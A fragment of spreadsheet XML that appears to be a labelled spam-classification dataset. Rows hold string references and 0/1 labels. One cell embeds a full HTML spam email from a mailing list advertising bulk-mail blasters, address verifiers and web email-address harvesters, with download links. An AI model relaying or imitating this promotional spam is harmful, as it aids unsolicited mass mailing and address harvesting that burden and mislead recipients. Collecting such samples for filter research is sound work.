      </c>
      <c r="D5281" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5282" hidden="1">
      <c r="A5282" s="1">
        <v>5280.0</v>
      </c>
      <c r="B5282" s="1" t="s">
        <v>2527</v>
      </c>
      <c r="C5282" s="1" t="s">
        <v>2528</v>
      </c>
      <c r="D5282" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5283" hidden="1">
      <c r="A5283" s="1">
        <v>5281.0</v>
      </c>
      <c r="B5283" s="1" t="s">
        <v>3774</v>
      </c>
      <c r="C5283" s="1" t="s">
        <v>3775</v>
      </c>
      <c r="D5283" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5284">
      <c r="A5284" s="1">
        <v>5282.0</v>
      </c>
      <c r="B5284" s="1" t="s">
        <v>1506</v>
      </c>
      <c r="C5284" s="1" t="s">
        <v>7333</v>
      </c>
      <c r="D5284" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5285">
      <c r="A5285" s="1">
        <v>5283.0</v>
      </c>
      <c r="B5285" s="1" t="s">
        <v>3493</v>
      </c>
      <c r="C5285" s="1" t="s">
        <v>3494</v>
      </c>
      <c r="D5285" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5286">
      <c r="A5286" s="1">
        <v>5284.0</v>
      </c>
      <c r="B5286" s="1" t="s">
        <v>7334</v>
      </c>
      <c r="C5286" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D5286" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5287" hidden="1">
      <c r="A5287" s="1">
        <v>5285.0</v>
      </c>
      <c r="B5287" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="C5287" s="1" t="s">
        <v>7335</v>
      </c>
      <c r="D5287" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5288" hidden="1">
      <c r="A5288" s="1">
        <v>5286.0</v>
      </c>
      <c r="B5288" s="1" t="s">
        <v>6730</v>
      </c>
      <c r="C5288" s="1" t="s">
        <v>6731</v>
      </c>
      <c r="D5288" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5289" hidden="1">
      <c r="A5289" s="1">
        <v>5287.0</v>
      </c>
      <c r="B5289" s="1" t="s">
        <v>7336</v>
      </c>
      <c r="C5289" s="1" t="s">
        <v>7337</v>
      </c>
      <c r="D5289" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5290" hidden="1">
      <c r="A5290" s="1">
        <v>5288.0</v>
      </c>
      <c r="B5290" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C5290" s="1" t="s">
        <v>4185</v>
      </c>
      <c r="D5290" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5291" hidden="1">
      <c r="A5291" s="1">
        <v>5289.0</v>
      </c>
      <c r="B5291" s="1" t="s">
        <v>2232</v>
      </c>
      <c r="C5291" s="1" t="s">
        <v>2646</v>
      </c>
      <c r="D5291" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5292" hidden="1">
      <c r="A5292" s="1">
        <v>5290.0</v>
      </c>
      <c r="B5292" s="1" t="s">
        <v>418</v>
      </c>
      <c r="C5292" s="1" t="s">
        <v>7338</v>
      </c>
      <c r="D5292" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5293">
      <c r="A5293" s="1">
        <v>5291.0</v>
      </c>
      <c r="B5293" s="1" t="s">
        <v>1908</v>
      </c>
      <c r="C5293" s="1" t="s">
        <v>1909</v>
      </c>
      <c r="D5293" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5294">
      <c r="A5294" s="1">
        <v>5292.0</v>
      </c>
      <c r="B5294" s="1" t="s">
        <v>7339</v>
      </c>
      <c r="C5294" s="1" t="s">
        <v>7340</v>
      </c>
      <c r="D5294" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5295" hidden="1">
      <c r="A5295" s="1">
        <v>5293.0</v>
      </c>
      <c r="B5295" s="1" t="s">
        <v>7341</v>
      </c>
      <c r="C5295" s="1" t="s">
        <v>7342</v>
      </c>
      <c r="D5295" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5296" hidden="1">
      <c r="A5296" s="1">
        <v>5294.0</v>
      </c>
      <c r="B5296" s="1" t="s">
        <v>7343</v>
      </c>
      <c r="C5296" s="1" t="s">
        <v>7344</v>
      </c>
      <c r="D5296" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5297">
      <c r="A5297" s="1">
        <v>5295.0</v>
      </c>
      <c r="B5297" s="1" t="s">
        <v>4690</v>
      </c>
      <c r="C5297" s="1" t="s">
        <v>4691</v>
      </c>
      <c r="D5297" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5298" hidden="1">
      <c r="A5298" s="1">
        <v>5296.0</v>
      </c>
      <c r="B5298" s="1" t="s">
        <v>210</v>
      </c>
      <c r="C5298" s="1" t="s">
        <v>7345</v>
      </c>
      <c r="D5298" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5299" hidden="1">
      <c r="A5299" s="1">
        <v>5297.0</v>
      </c>
      <c r="B5299" s="1" t="s">
        <v>7346</v>
      </c>
      <c r="C5299" s="1" t="s">
        <v>7347</v>
      </c>
      <c r="D5299" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5300" hidden="1">
      <c r="A5300" s="1">
        <v>5298.0</v>
      </c>
      <c r="B5300" s="1" t="s">
        <v>711</v>
      </c>
      <c r="C5300" s="1" t="s">
        <v>7348</v>
      </c>
      <c r="D5300" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5301">
      <c r="A5301" s="1">
        <v>5299.0</v>
      </c>
      <c r="B5301" s="1" t="s">
        <v>7349</v>
      </c>
      <c r="C5301" s="1" t="s">
        <v>7350</v>
      </c>
      <c r="D5301" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5302">
      <c r="A5302" s="1">
        <v>5300.0</v>
      </c>
      <c r="B5302" s="1" t="s">
        <v>7351</v>
      </c>
      <c r="C5302" s="3" t="str">
        <f>3CBODY bgColor=3D#ffffff=3E
 =3CDIV=3E=3CFONT face=3D&amp;#23435=3B&amp;#20307=3B size=3D2=3E
 =3CDIV=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EDirect Email 
 Blaster=3C=2FFONT=3E=3C=2FSTRONG=3E =3C=2FDIV=3E=3CFONT size=3D2=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CB=3E=3CFONT color=3D#006600=3E=3CI=3EThe program will send mail at the 
 rate of over 1=2C 000 e-mails per minute=2E&amp;nbsp=3B=3C=2FI=3E=3C=2FFONT=3E=3CBR=3ELegal and Fast 
 sending bulk emails&amp;nbsp=3B=3CBR=3E=3CFONT color=3D#006600=3E=3CI=3EBuilt in SMTP 
 server&amp;nbsp=3B=3C=2FI=3E=3C=2FFONT=3E=3CBR=3EHave Return Path&amp;nbsp=3B=3CBR=3ECan Check Mail 
 Address&amp;nbsp=3B=3CBR=3E=3CFONT color=3D#006600=3E=3CI=3EMake Error Send Address List=28 Remove or 
 Send Again=29&amp;nbsp=3B=3C=2FI=3E=3C=2FFONT=3E=3CBR=3ESupport multi-threads=2E&amp;nbsp=3B=3CBR=3ESupport 
 multi-smtp servers=2E&amp;nbsp=3B=3CBR=3EManages your opt-in E-Mail Lists&amp;nbsp=3B=3CBR=3EOffers an 
 easy-to-use interface!&amp;nbsp=3B=3CBR=3EEasy to configure and use&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CA 
 href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fedeb=5Fset=2Ezip=22=3E=3CSTRONG=3EDownload 
 Now=3C=2FSTRONG=3E=3C=2FA=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EMaillist 
 Verify=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EMaillist Verify is intended for e-mail addresses and mail 
 lists verifying=2E The main task is to determine which of addresses in the mail 
 list are dead=2E The program is oriented=2C basically=2C on programmers which have 
 their own mail lists to inform their users about new versions of their 
 programs=2E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EThe program works on the same algorithm as ISP mail systems 
 do=2E Mail servers addresses for specified address are extracted from DNS=2E The 
 program tries to connect with found SMTP-servers and simulates the sending of 
 message=2E It does not come to the message =3CNOBR=3Esending &amp;#8255=3B=2FNOBR&amp;gt=3B EMV disconnect 
 as soon as mail server informs does this address exist or not=2E EMV can 
 find=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CNOBR=3E&amp;nbsp=3Babout 90% of dead addresses &amp;#8255=3B=2FNOBR&amp;gt=3B some mail 
 systems receive all messages and only then see their&amp;nbsp=3B=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CNOBR=3Eaddresses and if the address is dead send the message 
 back with remark about it=2E=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FP=3E=3CNOBR=3E
 =3CP=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fbemv=5Fset=2Ezip=22=3E=3CSTRONG=3E=3CFONT 
 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FA=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EExpress Email 
 Blaster&amp;nbsp=3B=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EExpress Email Blaster&amp;nbsp=3B is a very fast=2C powerful yet 
 simple to use email sender=2E Utilizing multiple threads=2Fconnections=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E&amp;nbsp=3Band multiple SMTP servers your emails will be sent out 
 fast and easily=2E There are User Information=2C Attach Files=2C&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EAddress and Mail Logs four tabbed area for the E-mails 
 details for sending=2E About 25 SMTP servers come with the&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3Edemo version=2C and users may Add and Delete SMTP servers=2E 
 About =3CFONT color=3D#008000=3E=3CB=3E60=2C000=3C=2FB=3E=3C=2FFONT=3E E-mails will be sent out per 
 hour=2E=22=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fbeeb=5Fset=2Ezip=22=3E=3CFONT 
 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EExpress Email Address 
 Extractor=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FP=3E=3CFONT size=3D4=3E
 =3CP=3E=3CFONT color=3D#008000 size=3D3=3EThis program is the most efficient=2C easy to use 
 email address collector available on the =3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3D#008000 size=3D3=3E&amp;nbsp=3Binternet! =3C=2FFONT=3E=3CFONT 
 color=3D#000000 size=3D3=3EBeijing Express Email Address Extractor =28ExpressEAE=29 is 
 designed to extract=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 size=3D3=3E&amp;nbsp=3Be-mail addresses from web-pages on the 
 Internet =28using HTTP protocols=29 =2EExpressEAE=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 size=3D3=3E&amp;nbsp=3Bsupports operation through many proxy-server 
 and works very fast=2C as it is able of&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 size=3D3=3Eloading several pages simultaneously=2C and requires 
 very few resources=2E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 face=3DArial=3E=3CFONT size=3D3=3EWith it=2C you will be able 
 to=3C=2FFONT=3E=3CFONT size=3D2=3E =3C=2FFONT=3E=3CFONT size=3D3=3Euse targeted searches to crawl the 
 world wide web=2C extracting&amp;nbsp=3B=3C=2FFONT=3E=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3Ethousands of clean=2C fresh email 
 addresses=2E Ably Email address Extractor is unlike other&amp;nbsp=3B=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3Eaddress collecting programs=2C which 
 limit you to one or two search engines and are unable=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3E&amp;nbsp=3Bto do auto searches HUGE address=2E 
 Most of them collect a high percentage of incomplete=2C&amp;nbsp=3B=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3Eunusable addresses which will cause you 
 serious problems when using them in a mailing=2E&amp;nbsp=3B=3C=2FFONT=3E 
 =3CUL=3E
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EEasier to learn and use than any 
   other email address collector program available=2E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAccesses eight search 
   engines&amp;nbsp=3B=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAdd your own URLs to the list to be 
   searched=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial size=3D3=3E=3CFONT color=3D#008000=3ESupports operation through 
   =3C=2FFONT=3E=3CFONT color=3D#ff00ff=3Ea lot of=3C=2FFONT=3E=3CFONT color=3D#008000=3E proxy-server 
   and works very fast =28HTTP Proxy=29=3C=2FFONT=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAble of loading several pages 
   simultaneously=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3ERequires very few resources=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3ETimeout feature allows user to limit 
   the amount of time crawling in dead sites and traps=2E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial size=3D3=3E=3CFONT color=3D#008000=3EEasy to make =3C=2FFONT=3E=3CFONT 
   color=3D#ff00ff=3EHuge=3C=2FFONT=3E=3CFONT color=3D#008000=3E address list=3C=2FFONT=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EPause=2Fcontinue extraction at any 
   time=2E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAuto connection to the 
   Internet=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E
 =3CDIV=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Feeae=5Fset=2Ezip=22=3E=3CFONT 
 color=3D#008000 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CDIV=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial=3EExpress Email Address 
 Downloader=3C=2FFONT=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CUL=3E
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Eis a 32 bit Windows Program for e-mail 
   marketing=2E It is intended for easy and convenient=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#000000 size=3D2=3E&amp;nbsp=3Bsearch large 
   e-mail address lists from mail servers=2E The program can be operated 
   on&amp;nbsp=3B=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#000000 size=3D2=3EWindows 95=2F98=2FME=2F2000 
   and NT=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Esupport multi-threads =28up to 1024 
   connections=29=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Ehas the ability&amp;nbsp=3B to reconnect to the 
   mail server if the server has disconnected and&amp;nbsp=3B=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#000000 size=3D2=3Econtinue the searching 
   at the point where it has been interrupted=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Ehas an ergonomic interface that is easy to 
   set up and simple to use=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#008000 face=3DArial 
 size=3D4=3EFeatures=3A=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
 =3CUL type=3Ddisc=3E
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Esupport 
   multi-threads=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Eauto get smtp server 
   address=2Csupport multi-smtp servers=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Eauto save&amp;nbsp=3B E-Mail 
   Lists=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Eoffers an easy-to-use 
   interface!=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E
 =3CDIV=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Feead=5Fset=2Ezip=22=3E=3CFONT 
 color=3D#008000 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial=3EExpress Maillist 
 Manager=3C=2FFONT=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT size=3D2=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3Dblack size=3D3=3EThis program was designed to be a 
 complement to the =3C=2FFONT=3E=3CFONT color=3D#800080 size=3D3=3EDirect Email Blaster&amp;nbsp=3B 
 =3C=2FFONT=3E=3CFONT color=3Dblack size=3D3=3Eand =3C=2FFONT=3E=3CFONT color=3D#800080 size=3D3=3EEmail 
 Blaster =3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3Dblack size=3D3=3Esuite of bulk email software 
 programs=2E Its purpose is to organize your email lists in order to be 
 more&amp;nbsp=3B=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3Dblack size=3D3=3Eeffective with your email marketing 
 campaign=2E Some of its features include=3A=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CB=3E=3CFONT color=3D#008000 face=3DArial=3E=3CFONT size=3D3=3E&amp;#8255=3BCombine several lists into 
 one file=2E=3C=2FFONT=3E=3CBR=3E=3CFONT size=3D3=3E&amp;#8255=3BSplit up larger lists to make them more 
 manageable=2E=3C=2FFONT=3E=3CBR=3E=3CFONT size=3D3=3E&amp;#8255=3BRemove addresses from file=2E=3C=2FFONT=3E=3CBR=3E=3CFONT 
 size=3D3=3E&amp;#8255=3BManual editing=2C adding=2C and deleting of addresses=2E=3C=2FFONT=3E=3CBR=3E=3CFONT 
 size=3D3=3E&amp;#8255=3BAbility to auto clean lists=2C that is=2C remove any duplicate or unwanted 
 addresses=2E=3C=2FFONT=3E=3CBR=3E=3CFONT size=3D3=3E&amp;#8255=3BMaintain all your address lists within the 
 program so you no&amp;nbsp=3B longer need to keep all your=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E
 =3CP=3E=3CB=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3E&amp;nbsp=3Blists saved as separate text 
 files=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fbemm=5Fset=2Ezip=22=3E=3CFONT 
 color=3D#008000 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E&amp;nbsp=3B=3C=2FP=3E
 =3CDIV=3E=3CFONT face=3DArial=3Eif you want to remove your email=2C please send email to =3CA 
 href=3D=22mailto=3Atargetemailremoval=40btamail=2Enet=2Ecn=22=3Etargetemailremoval=40btamail=2Enet=2Ecn=3C=2FA=3E=3C=2FFONT=3E 
 =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E&amp;nbsp=3B=3C=2FDIV=3E=3C=2FFONT=3E=3C=2FDIV=3E=3C=2FFONT=3E=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FDIV=3E
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 webmake-talk mailing list
 webmake-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/webmake-talk
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D5302" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5303" hidden="1">
      <c r="A5303" s="1">
        <v>5301.0</v>
      </c>
      <c r="B5303" s="1" t="s">
        <v>6555</v>
      </c>
      <c r="C5303" s="1" t="s">
        <v>6556</v>
      </c>
      <c r="D5303" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5304" hidden="1">
      <c r="A5304" s="1">
        <v>5302.0</v>
      </c>
      <c r="B5304" s="1" t="s">
        <v>6854</v>
      </c>
      <c r="C5304" s="1" t="s">
        <v>7086</v>
      </c>
      <c r="D5304" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5305">
      <c r="A5305" s="1">
        <v>5303.0</v>
      </c>
      <c r="B5305" s="1" t="s">
        <v>593</v>
      </c>
      <c r="C5305" s="1" t="s">
        <v>6145</v>
      </c>
      <c r="D5305" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5306" hidden="1">
      <c r="A5306" s="1">
        <v>5304.0</v>
      </c>
      <c r="B5306" s="1" t="s">
        <v>7352</v>
      </c>
      <c r="C5306" s="1" t="s">
        <v>7353</v>
      </c>
      <c r="D5306" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5307">
      <c r="A5307" s="1">
        <v>5305.0</v>
      </c>
      <c r="B5307" s="1" t="s">
        <v>7354</v>
      </c>
      <c r="C5307" s="1" t="s">
        <v>7355</v>
      </c>
      <c r="D5307" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5308" hidden="1">
      <c r="A5308" s="1">
        <v>5306.0</v>
      </c>
      <c r="B5308" s="1" t="s">
        <v>5752</v>
      </c>
      <c r="C5308" s="1" t="s">
        <v>5753</v>
      </c>
      <c r="D5308" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5309" hidden="1">
      <c r="A5309" s="1">
        <v>5307.0</v>
      </c>
      <c r="B5309" s="1" t="s">
        <v>893</v>
      </c>
      <c r="C5309" s="1" t="s">
        <v>894</v>
      </c>
      <c r="D5309" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5310" hidden="1">
      <c r="A5310" s="1">
        <v>5308.0</v>
      </c>
      <c r="B5310" s="1" t="s">
        <v>7356</v>
      </c>
      <c r="C5310" s="1" t="s">
        <v>7357</v>
      </c>
      <c r="D5310" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5311" hidden="1">
      <c r="A5311" s="1">
        <v>5309.0</v>
      </c>
      <c r="B5311" s="1" t="s">
        <v>5373</v>
      </c>
      <c r="C5311" s="1" t="s">
        <v>7358</v>
      </c>
      <c r="D5311" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5312" hidden="1">
      <c r="A5312" s="1">
        <v>5310.0</v>
      </c>
      <c r="B5312" s="1" t="s">
        <v>7301</v>
      </c>
      <c r="C5312" s="1" t="s">
        <v>7302</v>
      </c>
      <c r="D5312" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5313">
      <c r="A5313" s="1">
        <v>5311.0</v>
      </c>
      <c r="B5313" s="1" t="s">
        <v>7359</v>
      </c>
      <c r="C5313" s="1" t="s">
        <v>7360</v>
      </c>
      <c r="D5313" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5314" hidden="1">
      <c r="A5314" s="1">
        <v>5312.0</v>
      </c>
      <c r="B5314" s="1" t="s">
        <v>5225</v>
      </c>
      <c r="C5314" s="1" t="s">
        <v>7361</v>
      </c>
      <c r="D5314" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5315">
      <c r="A5315" s="1">
        <v>5313.0</v>
      </c>
      <c r="B5315" s="1" t="s">
        <v>7362</v>
      </c>
      <c r="C5315" s="1" t="s">
        <v>7363</v>
      </c>
      <c r="D5315" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5316" hidden="1">
      <c r="A5316" s="1">
        <v>5314.0</v>
      </c>
      <c r="B5316" s="1" t="s">
        <v>4327</v>
      </c>
      <c r="C5316" s="1" t="s">
        <v>7364</v>
      </c>
      <c r="D5316" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5317" hidden="1">
      <c r="A5317" s="1">
        <v>5315.0</v>
      </c>
      <c r="B5317" s="1" t="s">
        <v>2964</v>
      </c>
      <c r="C5317" s="1" t="s">
        <v>2965</v>
      </c>
      <c r="D5317" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5318">
      <c r="A5318" s="1">
        <v>5316.0</v>
      </c>
      <c r="B5318" s="1" t="s">
        <v>7365</v>
      </c>
      <c r="C5318" s="1" t="s">
        <v>7366</v>
      </c>
      <c r="D5318" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5319">
      <c r="A5319" s="1">
        <v>5317.0</v>
      </c>
      <c r="B5319" s="1" t="s">
        <v>1758</v>
      </c>
      <c r="C5319" s="1" t="s">
        <v>1759</v>
      </c>
      <c r="D5319" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5320" hidden="1">
      <c r="A5320" s="1">
        <v>5318.0</v>
      </c>
      <c r="B5320" s="1" t="s">
        <v>7367</v>
      </c>
      <c r="C5320" s="1" t="s">
        <v>7368</v>
      </c>
      <c r="D5320" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5321" hidden="1">
      <c r="A5321" s="1">
        <v>5319.0</v>
      </c>
      <c r="B5321" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C5321" s="1" t="s">
        <v>6787</v>
      </c>
      <c r="D5321" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5322" hidden="1">
      <c r="A5322" s="1">
        <v>5320.0</v>
      </c>
      <c r="B5322" s="1" t="s">
        <v>7369</v>
      </c>
      <c r="C5322" s="1" t="s">
